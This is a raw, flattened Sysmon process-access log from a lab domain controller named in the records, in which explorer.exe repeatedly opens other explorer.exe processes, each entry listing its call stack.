16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 